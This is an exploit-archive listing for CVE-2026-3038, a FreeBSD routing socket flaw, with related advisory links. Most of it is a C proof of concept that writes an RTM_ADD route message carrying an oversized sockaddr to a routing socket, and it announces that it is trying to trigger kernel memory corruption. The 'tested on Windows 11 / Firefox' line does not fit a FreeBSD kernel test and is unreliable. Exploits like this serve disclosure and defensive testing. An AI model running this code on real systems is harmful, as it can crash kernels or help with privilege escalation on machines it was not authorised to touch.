
📄 FreeBSD Routing Socket Input Validation

🗓️ 26 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 132 Views

Tests FreeBSD routing socket input validation by crafting an RTM_ADD route message that carries an oversized sockaddr.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-3038
9 Mar 202612:25
attackerkb
Circl
CVE-2026-3038
25 Feb 202602:05
circl
CNNVD
FreeBSD 安全漏洞
9 Mar 202600:00
cnnvd
CVE
CVE-2026-3038
9 Mar 202612:25
cve
Cvelist
CVE-2026-3038 Local DoS and possible privilege escalation via routing sockets
9 Mar 202612:25
cvelist
EUVD
EUVD-2026-10334
9 Mar 202615:30
euvd
EUVD
EUVD-2026-10335
9 Mar 202615:30
euvd
FreeBSD
FreeBSD -- Local DoS and possible privilege escalation via routing sockets
24 Feb 202600:00
freebsd
FreeBSD Advisory
FreeBSD-SA-26:05.route
24 Feb 202600:00
freebsd_advisory
Tenable Nessus
FreeBSD : FreeBSD -- Local DoS and possible privilege escalation via routing sockets (fbc47390-11e9-11f1-8148-bc241121aa0a)
28 Feb 202600:00
nessus
=============================================================================================================================================
    | # Title     : FreeBSD Routing Socket Input Validation Analysis – Oversized sockaddr in RTM_ADD                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.freebsd.org/                                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    :  The PoC tests the robustness of the FreeBSD routing socket subsystem by crafting an RTM_ADD message that contains an 
                      intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
    				  
                      4 you https://packetstorm.news/files/id/216124/
    
    [+] POC   :  
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <net/route.h>
    #include <net/if.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    
    /*
     * Pad a sockaddr length to the next multiple of sizeof(long), which is the
     * unit this program uses to space the addresses that follow the routing
     * message header. A length that is zero or negative yields sizeof(long).
     * The argument is expanded more than once, so pass a side-effect-free
     * expression.
     */
    #define ROUNDUP(a) \
        (((a) > 0) ? (((a) + (sizeof(long) - 1)) & ~(sizeof(long) - 1)) : sizeof(long))
    
    /*
     * Local overlay used to write a sockaddr-shaped record into the message
     * buffer. The first two fields carry the same names as the BSD sockaddr
     * header (sa_len, sa_family); the payload array is enlarged so the record
     * is 256 bytes in total, well beyond the 128-byte sockaddr_storage limit
     * the write-up refers to. It only describes the sender's view of the bytes;
     * the receiving kernel decides how far to trust sa_len.
     */
    struct malicious_sockaddr {
        /* Claimed total length of the address in bytes; one byte, so at most 255. */
        unsigned char  sa_len;    
        /* Address family tag (main() sets AF_INET). */
        unsigned char  sa_family; 
        /* Payload area following the two header bytes. */
        char           sa_data[254]; 
    };
    
    /*
     * Input-validation probe for the routing socket, labelled by its own banner
     * as a test for CVE-2026-3038.
     *
     * Builds one RTM_ADD message in a stack buffer: an rt_msghdr, then a
     * destination address whose sa_len (180) is larger than the 128-byte
     * sockaddr_storage limit named in the write-up, then an ordinary
     * sockaddr_in gateway. The message is submitted with a single write() on a
     * PF_ROUTE socket.
     *
     * Returns 1 if the socket cannot be created, otherwise 0 -- including when
     * write() fails. The program only reports what write() returned; it does
     * not itself establish whether the kernel is affected.
     * NOTE(review): a kernel carrying the fix from FreeBSD-SA-26:05.route
     * presumably rejects this message with an error -- confirm the expected
     * errno against the advisory before using this as a regression check.
     */
    int main() {
        int s;
        char buf[1500];
        struct rt_msghdr *rtm;
        struct malicious_sockaddr *dst, *gw;
        int l;  /* declared but never used */
    
        printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");
    
        /* Raw routing socket; AF_UNSPEC as protocol selects no address-family filter. */
        s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
        if (s < 0) {
            perror("[-] socket(PF_ROUTE) failed");
            return 1;
        }
    
        /* Zero the whole buffer so every byte not set below is 0. */
        memset(buf, 0, sizeof(buf));
        rtm = (struct rt_msghdr *)buf;
        /* Placeholder; the real length is filled in once both addresses are laid out. */
        rtm->rtm_msglen = 0; 
        rtm->rtm_version = RTM_VERSION;
        rtm->rtm_type = RTM_ADD; 
        /* Bitmask announcing which sockaddrs follow the header: destination, then gateway. */
        rtm->rtm_addrs = RTA_DST | RTA_GATEWAY;
        rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
        rtm->rtm_pid = getpid();
        rtm->rtm_seq = 42;
    
        /* The destination address starts immediately after the header. */
        dst = (struct malicious_sockaddr *)(rtm + 1);
        dst->sa_family = AF_INET;
        /*
         * The field under test: the declared length exceeds 128 bytes. On the
         * sending side it still fits inside the 256-byte overlay and the
         * 1500-byte buffer, so this program's own writes stay in bounds.
         */
        dst->sa_len = 180; 
        /* 170 filler bytes; the rest of the declared 180 stays zero from the memset above. */
        memset(dst->sa_data, 'A', 170);
    
        /* The gateway is placed at the padded end of the destination record. */
        int dst_space = ROUNDUP(dst->sa_len);
        gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
        gw->sa_family = AF_INET;
        /* The gateway is a normally sized IPv4 address, so only dst is out of range. */
        gw->sa_len = sizeof(struct sockaddr_in);
        ((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");
    
        /* Total message length: header plus both padded address records. */
        rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);
    
        printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
        printf("[!] Attempting to trigger kernel memory corruption...\n");
    
        /* A negative return means the kernel refused the message; errno says why. */
        if (write(s, buf, rtm->rtm_msglen) < 0) {
    
            fprintf(stderr, "[-] Result: %s\n", strerror(errno));
        } else {
            /* A non-negative return only shows the write was accepted, nothing more. */
            printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
        }
    
        close(s);
        return 0;
    }
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================


26 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.5
EPSS0.00027
SSVC
132